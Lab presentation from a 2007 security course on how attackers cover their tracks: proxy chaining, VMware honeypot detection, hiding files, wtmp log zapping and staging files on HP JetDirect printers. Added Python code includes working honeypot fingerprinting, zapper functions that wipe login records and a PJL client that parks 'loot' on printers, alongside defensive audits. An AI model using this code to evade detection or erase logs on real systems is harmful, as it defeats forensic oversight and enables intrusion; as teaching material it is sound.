How Hackers Cover Their Tracks
ECE 4112
May 1st, 2007

Group 1
Chris Garyet
Christopher Smith

Introduction

Lab Content

Conclusions

Questions

Introduction

• This lab presents techniques hackers use to cover their tracks
• Most experienced blackhats follow a series of steps to compromise a system:
  • Probe the network for weak links through a proxy server
  • Use direct or indirect methods
  • Ensure the system is not a honeypot
  • Disguise and hide malicious software
  • Cover tracks by editing log files
• A system administrator who knows these steps can recognize the traces each one leaves, discover the intrusion and attempt to trace the hacker


Section 1: Proxies

• Background
  • Hackers want to attack anonymously
  • Utilize SOCKS 4 or SOCKS 5 proxy servers
  • Generally chained together, with the hops encrypted; SOCKS itself relays traffic in the clear, so the encryption comes from the tunnel carrying it (Tor, or SSH in Exercise 1.1)
  • Tor: http://tor.eff.org/index.html.en
  • Proxychains: http://proxychains.sourceforge.net/
• Lab layout
  • RedHat 7.2 communicating through RedHat WS 4
  • Connect to an Apache web server


Section 1: Proxies

• Exercise 1.1 (simulates a SOCKS proxy using SSH)
  • Create the SSH tunnel: ssh -N -D 7001 57.35.6.x
    (-D opens a local SOCKS4/SOCKS5 listener on port 7001 that forwards every connection through the SSH host; -N runs no remote command)
  • Set up Netscape to use the listener (127.0.0.1, port 7001) as its SOCKS proxy
  • Connect to the Apache web server: 138.210.237.99
  • Nmap through the proxy (via proxychains): only TCP connect scans (-sT) work, because a SOCKS proxy relays whole TCP connections and cannot carry SYN scans, ICMP pings or UDP; add -Pn so nmap does not try to ping the target directly and reveal the real source address


Section 2: Honeypot Detection

• Background
  • A honeypot is a trap set for malicious hackers: a system that exists only to be attacked and watched
  • Two important types
    • Low-interaction: Honeyd (emulates services and network stacks)
    • High-interaction: Honeynet (real systems behind a monitoring gateway)
  • Many honeypots run under VMware to emulate multiple systems on one computer
  • Examine how to detect that a compromised machine is running inside VMware


Section 2: Honeypot Detection

• Website devoted to honeypot detection: http://www.trapkit.de/tools/index.html
• Scoopy Doo
  • Compares the target machine's descriptor table registers (IDT, GDT, LDT) against the values VMware is known to use
  • Runs on Linux and Windows
• Jerry
  • Uses the I/O backdoor in the VMware binary (the "VMXh" magic I/O port)
  • Examines the value of register EAX after the backdoor call
• Caveat: both tests are hardware-specific; the descriptor-table values move around on multi-core hosts and 64-bit guests, and the backdoor port can be disabled in the VM configuration, so a negative result is not proof of real hardware
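When the register tricks above fail or cannot be run (no compiler on the box, a 64-bit guest, backdoor disabled), an attacker falls back on fingerprints that are visible from plain user space: VMware's registered MAC prefixes, DMI strings, the PCI vendor ID 15AD and the CPUID "hypervisor" flag. The block below is an added example (not a trapkit tool and not part of the lab) that scores those signals; the sample inputs are constructed. The `hypervisor` flag only says some hypervisor is present, not which one, so it is the weakest of the four.

```python
"""User-space VMware fingerprinting on Linux, as a complement to Scoopy Doo / Jerry.
Added example; sample inputs in the tests are constructed, not captured."""
import glob
import re

# IEEE OUIs registered to VMware, Inc. (guest NICs and vmnet adapters)
VMWARE_OUIS = {"00:05:69", "00:0c:29", "00:1c:14", "00:50:56"}
VMWARE_PCI_VENDOR = "15ad"
DMI_PATTERNS = [re.compile(p, re.I) for p in (r"VMware", r"Virtual Platform")]


def norm_mac(mac: str) -> str:
    return mac.strip().lower().replace("-", ":")


def mac_hits(macs):
    return [m for m in macs if norm_mac(m)[:8] in VMWARE_OUIS]


def dmi_hits(dmi: dict):
    """dmi maps a /sys/class/dmi/id/<name> file to its content."""
    return [k for k, v in dmi.items() if any(p.search(v) for p in DMI_PATTERNS)]


def pci_vendor_hits(vendor_ids):
    """vendor_ids as read from /sys/bus/pci/devices/*/vendor, e.g. '0x15ad'."""
    hits = []
    for v in vendor_ids:
        v = v.strip().lower()
        if v.startswith("0x"):
            v = v[2:]
        if v == VMWARE_PCI_VENDOR:
            hits.append(v if False else v)  # keep normalised id
    return ["0x" + h for h in hits]


def cpuinfo_hypervisor(cpuinfo_text: str) -> bool:
    m = re.search(r"^flags\s*:\s*(.*)$", cpuinfo_text, re.M)
    return bool(m and "hypervisor" in m.group(1).split())


def score_vmware(macs, dmi, pci_vendor_ids, cpuinfo_text):
    """Return (number of independent signals, evidence). Two or more: treat as a VM
    and, in this lab's context, as a possible honeypot."""
    evidence = {}
    if mac_hits(macs):
        evidence["mac"] = mac_hits(macs)
    if dmi_hits(dmi):
        evidence["dmi"] = dmi_hits(dmi)
    if pci_vendor_hits(pci_vendor_ids):
        evidence["pci"] = pci_vendor_hits(pci_vendor_ids)
    if cpuinfo_hypervisor(cpuinfo_text):
        evidence["cpuid"] = ["hypervisor flag (any hypervisor)"]
    return len(evidence), evidence


def read(path: str) -> str:
    try:
        with open(path) as f:
            return f.read().strip()
    except OSError:
        return ""


def collect_live():
    """Gather the same signals from the running Linux host via sysfs/procfs."""
    macs = [read(p) for p in glob.glob("/sys/class/net/*/address")]
    dmi = {n: read(f"/sys/class/dmi/id/{n}")
           for n in ("sys_vendor", "product_name", "board_vendor", "bios_vendor")}
    vendors = [read(p) for p in glob.glob("/sys/bus/pci/devices/*/vendor")]
    return score_vmware(macs, dmi, vendors, read("/proc/cpuinfo"))


if __name__ == "__main__":
    print(collect_live())
```

The honeypot operator's counter-move is the mirror image: change the guest's MAC to a non-VMware prefix, patch the DMI strings and avoid VMware's paravirtual devices, which is why a single signal should never be trusted on its own.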


Section 3: Hiding Files

• Background
  • Once a system has been compromised the hacker must hide his presence
  • One way is to hide the files the hacker uses to exploit the target machine
  • Linux and Windows machines have different file systems and thus require different hiding mechanisms
  • Undeletable folders are another nuisance administrators face
  • http://archives.neohapsis.com/archives/sf/ms/2001-q2/att-1116/01-THE-END-OF-DELETERS-v2.1.txt


Section 3: Hiding Files

• Exercise 3.1 (Hiding Files in Linux)
  • Hide files with the "." method: a leading dot keeps a name out of plain ls output, and names such as "..." or ". " blend in with the . and .. entries that ls -la always shows; only a careful ls -la (or find with -name ".*") reveals them
  • Hide files with ext2hide, which stores data in reserved space of the ext2 file system so that it never appears as a directory entry at all
  • http://e2fsprogs.sourceforge.net/
  • http://sourceforge.net/projects/ext2hide/
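A defender's counterpart to the "." method is a name audit that flags exactly the tricks above: names made only of dots, names padded with whitespace or control characters, and dotfiles in directories where no legitimate dotfile belongs. This is an added example, not part of the lab; the list of suspect parent directories is an assumption and will need local tuning (for instance /dev/.udev on some systems is benign). ext2hide is not covered, since it leaves no directory entry to audit.

```python
"""Audit directory names for the Linux file-hiding tricks of Exercise 3.1.
Added example; the sample listing in the test is constructed."""
import os

# Directories where dotfiles are rare and a favourite place to stash tools (assumption)
SUSPECT_PARENTS = ("/dev", "/lib", "/usr/lib", "/var/lib")


def reasons_for(name: str, parent: str = "") -> list:
    """Return the list of reasons `name` looks like a hidden/disguised entry."""
    if name in (".", ".."):
        return []
    reasons = []
    if name.startswith(".") and set(name) <= {"."}:
        reasons.append("dots only (mimics . and ..)")
    if name != name.strip():
        reasons.append("leading/trailing whitespace")
    if any(ord(c) < 32 or ord(c) == 127 for c in name):
        reasons.append("control character")
    if name.startswith(".") and any(parent == p or parent.startswith(p + "/")
                                    for p in SUSPECT_PARENTS):
        reasons.append(f"dotfile under {parent}")
    return reasons


def audit_names(names, parent: str = "") -> list:
    """Apply reasons_for to a listing; returns [(name, reasons), ...] for hits only."""
    hits = []
    for n in names:
        r = reasons_for(n, parent)
        if r:
            hits.append((n, r))
    return hits


def audit_tree(root: str) -> list:
    """Walk a real tree and report (full path, reasons) for every suspicious name."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for n, r in audit_names(dirnames + filenames, dirpath):
            hits.append((os.path.join(dirpath, n), r))
    return hits


if __name__ == "__main__":
    import sys
    for path, why in audit_tree(sys.argv[1] if len(sys.argv) > 1 else "/tmp"):
        print(repr(path), "->", "; ".join(why))
```

Run it as root against / (or the partitions a rootkit would target) and diff the output against a known-good baseline; printing paths with repr() is deliberate, because a name like ". " is invisible otherwise.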


Section 3: Hiding Files

• Exercise 3.2 (Hiding Files in Windows)
  • Hide files with file attributes: attrib +h +s is the Windows counterpart of changing permissions with chmod on Linux; Explorer then hides the file unless "show hidden and system files" is enabled, and dir skips it unless run with /a
  • Hide files in an NTFS Alternate Data Stream (for example file.txt:payload.exe); the stream does not change the host file's listed size and neither dir nor Explorer shows it, so it has to be found with stream-aware tools (Sysinternals streams, or dir /r on Vista and later)


Section 4: Editing & Removing Log Files

• Background
  • Log files can indicate that a machine has been compromised
  • They can also give away the hacker's "trade secrets" and lead to the exploited hole being patched


Section 4: Editing & Removing Log Files

• Editing logs in Linux
  • Linux logs can be modified with the proper tools
  • syslogd output (/var/log/messages, /var/log/secure and similar) is plain ASCII text and can be edited with any text editor
  • utmp, wtmp and lastlog are binary files of fixed-size records, so they need a rootkit tool (a "zapper") that rewrites or zeroes individual records
  • Caveat for administrators: logs that are also shipped to a remote syslog host, or written append-only (chattr +a), raise the bar considerably; the remote copy survives the cleanup and the attribute has to be removed before the local file can be trimmed
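The reason wtmp needs a tool rather than an editor is its layout: an array of 384-byte records (glibc's struct utmp on Linux x86/x86-64). The block below is an added example, not the lab's code or any real rootkit: it builds a constructed wtmp, wipes one user the two ways simple zappers do (zero the record in place, or drop it and rewrite the file shorter), and then audits the file for the trace each style leaves. The login history and the attacker address 57.35.6.1 are constructed.

```python
"""wtmp records, two zapper behaviours, and the checks that catch them.
Added example; the sample history is constructed."""
import struct

# glibc struct utmp (Linux, 32-bit time values): 384 bytes, little-endian
UTMP_FMT = "<h2xi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)
assert UTMP_SIZE == 384
EMPTY, BOOT_TIME, USER_PROCESS, DEAD_PROCESS = 0, 2, 7, 8


def pack(ut_type, pid, line, user, host, tv_sec):
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), line[:4].encode(),
                       user.encode(), host.encode(), 0, 0, 0, tv_sec, 0, 0, 0, 0, 0)


def unpack(rec: bytes) -> dict:
    f = struct.unpack(UTMP_FMT, rec)
    c = lambda b: b.split(b"\0", 1)[0].decode(errors="replace")
    return {"type": f[0], "pid": f[1], "line": c(f[2]), "user": c(f[4]),
            "host": c(f[5]), "time": f[9]}


def records(data: bytes) -> list:
    if len(data) % UTMP_SIZE:
        raise ValueError("wtmp length is not a multiple of the record size")
    return [unpack(data[i:i + UTMP_SIZE]) for i in range(0, len(data), UTMP_SIZE)]


def sample_wtmp() -> bytes:
    """Constructed history: reboot, root on the console, the attacker on pts/3, a logout, alice."""
    return b"".join([
        pack(BOOT_TIME, 0, "~", "reboot", "", 1177977600),
        pack(USER_PROCESS, 1201, "tty1", "root", "", 1177981200),
        pack(USER_PROCESS, 2310, "pts/3", "mallory", "57.35.6.1", 1177984800),
        pack(DEAD_PROCESS, 2310, "pts/3", "", "", 1177986600),   # logout: ut_user is blank
        pack(USER_PROCESS, 2500, "pts/0", "alice", "138.210.237.5", 1177988400),
    ])


def zap_zero(data: bytes, user: str) -> bytes:
    """Overwrite every record for `user` with zeros (the classic zap behaviour)."""
    out = bytearray(data)
    for i in range(0, len(out), UTMP_SIZE):
        if unpack(bytes(out[i:i + UTMP_SIZE]))["user"] == user:
            out[i:i + UTMP_SIZE] = b"\0" * UTMP_SIZE
    return bytes(out)


def zap_remove(data: bytes, user: str) -> bytes:
    """Drop the records instead, rewriting the file shorter."""
    return b"".join(data[i:i + UTMP_SIZE] for i in range(0, len(data), UTMP_SIZE)
                    if unpack(data[i:i + UTMP_SIZE])["user"] != user)


def audit(data: bytes) -> list:
    """Defender's checks: zeroed holes, time running backwards, logouts without logins."""
    findings, last_t, open_lines = [], None, set()
    for n, r in enumerate(records(data)):
        if r["type"] == EMPTY:                      # wtmp never legitimately holds EMPTY records
            findings.append(f"record {n}: zeroed entry inside wtmp (hole)")
            continue
        if last_t is not None and r["time"] < last_t:
            findings.append(f"record {n}: timestamp goes backwards")
        last_t = r["time"]
        if r["type"] == USER_PROCESS:
            open_lines.add(r["line"])
        elif r["type"] == DEAD_PROCESS:
            if r["line"] not in open_lines:
                findings.append(f"record {n}: logout on {r['line']} with no matching login")
            open_lines.discard(r["line"])
    return findings


if __name__ == "__main__":
    for label, data in (("clean", sample_wtmp()),
                        ("zeroed", zap_zero(sample_wtmp(), "mallory")),
                        ("removed", zap_remove(sample_wtmp(), "mallory"))):
        print(label, audit(data) or "no findings")
```

Both wiping styles leave the orphaned DEAD_PROCESS record, because logout entries carry the terminal line but a blank user name and a zapper that matches on the user name never sees them; a more careful tool also has to remove or rewrite those, and lastlog (one fixed record per UID) separately.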


Section 4: Editing & Removing Log Files

• Editing logs in Windows
  • Windows event logs can be cleared with the Event Viewer, but not edited entry by entry; removing individual entries means rewriting the log files offline with a separate tool
  • Logs cover application failures and security warnings, including failed login attempts (when auditing of logon events is enabled)
  • Caveat: clearing the Security log itself writes an event ("The audit log was cleared", ID 517 on NT/2000/XP/2003 and 1102 on Vista and later), so an otherwise empty log holding that single entry is itself an indicator


Section 5: Indirect and Passive Attacks

• Background
  • An attacker always wants to attack through indirect machines
  • Doing so hides the compromised machine and therefore the hacker's whereabouts
  • HP JetDirect print servers allow attacks to be launched indirectly


Section 5: Indirect and Passive Attacks

• Exercise 5.1 (HP JetDirect Exploitation)
  • HiJetter: http://www.phenoelit.de/hp/download.html
  • Store files and scripts on the printer's file system
  • Create websites served by the printer: http://*Printer IP*/hp/device/
  • Run nmap scans through it
• Caveat: a printer asks for no password for most of this and keeps little or no record of what passed through it, which is exactly why it makes a good cover machine; on the defender's side, a printer that opens connections to other hosts should never look normal
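HiJetter is a Java tool and its source is not reproduced here. The following is an added example of the underlying PJL file-system commands such tools send to a JetDirect printer on TCP port 9100 (syntax as in HP's PJL Technical Reference; the use of PJL by HiJetter, the `0:/` volume path and the directory listing reply are assumptions, and the reply text is constructed). It shows how the printer becomes a file store and what a defender capturing port 9100 would see.

```python
"""PJL file-system commands for storing and listing files on a JetDirect printer.
Added example, not HiJetter's code; command syntax per HP's PJL Technical Reference."""
import re
import socket

UEL = b"\x1b%-12345X"   # Universal Exit Language: switches the printer into/out of PJL
CRLF = b"\r\n"


def pjl_job(*commands: bytes) -> bytes:
    """Wrap PJL commands in UEL so the printer enters PJL and returns afterwards."""
    return UEL + b"@PJL" + CRLF + CRLF.join(commands) + CRLF + UEL


def fsinit(volume: str = "0:") -> bytes:
    return f'@PJL FSINIT VOLUME="{volume}"'.encode()


def fsdirlist(path: str = "0:/", entry: int = 1, count: int = 65535) -> bytes:
    return f'@PJL FSDIRLIST NAME="{path}" ENTRY={entry} COUNT={count}'.encode()


def fsdownload(path: str, payload: bytes) -> bytes:
    """Store a file on the printer (FSDOWNLOAD is host -> printer): header, CRLF, raw bytes."""
    header = f'@PJL FSDOWNLOAD FORMAT:BINARY SIZE={len(payload)} NAME="{path}"'.encode()
    return header + CRLF + payload


def fsupload(path: str, size: int, offset: int = 0) -> bytes:
    """Read a stored file back (FSUPLOAD is printer -> host)."""
    return f'@PJL FSUPLOAD NAME="{path}" OFFSET={offset} SIZE={size}'.encode()


def fsdelete(path: str) -> bytes:
    return f'@PJL FSDELETE NAME="{path}"'.encode()


DIRLINE = re.compile(rb"^(?P<name>.+?) TYPE=(?P<type>DIR|FILE)(?: SIZE=(?P<size>\d+))?\s*$")


def parse_fsdirlist(reply: bytes) -> list:
    """Parse an FSDIRLIST reply: echoed command line, then `name TYPE=DIR|FILE [SIZE=n]`
    lines, terminated by a form feed."""
    entries = []
    body = reply.split(CRLF, 1)[1] if CRLF in reply else b""
    for line in body.split(CRLF):
        m = DIRLINE.match(line.rstrip(b"\x0c"))
        if m:
            entries.append({"name": m["name"].decode(), "type": m["type"].decode(),
                            "size": int(m["size"]) if m["size"] else None})
    return entries


def send_pjl(host: str, data: bytes, port: int = 9100, timeout: float = 5.0) -> bytes:
    """Ship a PJL job to the printer and return its answer (up to the form feed). Live only."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(data)
        try:
            while True:
                c = s.recv(4096)
                if not c:
                    break
                chunks.append(c)
                if c.endswith(b"\x0c"):
                    break
        except socket.timeout:
            pass
    return b"".join(chunks)


# Constructed reply, in the shape the reference describes; not captured from a device
SAMPLE_REPLY = (b'@PJL FSDIRLIST NAME="0:/" ENTRY=1\r\n'
                b'. TYPE=DIR\r\n.. TYPE=DIR\r\nwebServer TYPE=DIR\r\n'
                b'loot.tgz TYPE=FILE SIZE=4096\r\n\x0c')
```

A typical session is `pjl_job(fsinit(), fsdownload("0:/loot.tgz", data))` to park a file, later `pjl_job(fsupload("0:/loot.tgz", 4096))` to fetch it from another host, and `fsdelete` when done; nothing in this exchange authenticates the sender, and the printer's own web pages under /hp/device/ are served from the same file system.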


Conclusion

• Covering your tracks is key to effective hacking
• Avoid honeypots, so that exploits and methods can be reused without being captured and analysed
• Hiding files and changing log files effectively covers tracks
• Running scans and attacks from behind cover machines helps protect the hacker's identity

Questions